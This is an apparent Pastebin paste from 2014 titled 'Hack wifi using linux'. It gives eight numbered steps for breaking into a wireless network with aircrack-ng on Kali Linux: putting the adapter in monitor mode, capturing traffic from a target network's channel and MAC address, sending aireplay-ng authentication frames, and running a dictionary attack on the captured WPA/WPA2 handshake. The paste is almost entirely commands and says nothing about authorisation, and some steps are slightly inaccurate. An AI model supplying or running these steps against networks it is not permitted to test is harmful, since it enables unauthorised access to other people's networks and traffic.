indongsaeng

Hack wifi using linux

Jun 3rd, 2014
251
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.82 KB | None | 0 0
  1. 1. install linux (I prefer Kali Linux)
  2. 2. open terminal
  3. 3. type "sudo apt-get install aircrack-ng"
  4. 4. type "airmon-ng start wlan0"
  5. where ('wlan0' is the wireless interface)
  6. 5. type "airodump-ng mon0"
  7. where (‘mon0′ is the monitored interface)
  8. 6. type "airodump-ng -c channel -w filename –bssid macaddrs mon0"
  9. where (‘channel’ is the Network’s channel number) (‘filename’ is the name of the file that airodump-ng will save its data) (‘macaddrs’ is the Network’s MAC Address)
  10. 7. type "aireplay-ng -1 0 -a bssid mon0"
  11. (where ‘bssid’ is the Network‘s MAC Address)
  12. 8. type "aircrack-ng -w dictionary /username/filename"
  13. (‘dictionary’ is the name/path of your dictionary) (‘username’ is your username – on Kali Linux is ‘root’ by default) (‘filename’ is the captured WPA/WPA2 Handshake)
Add Comment
Please, Sign In to add comment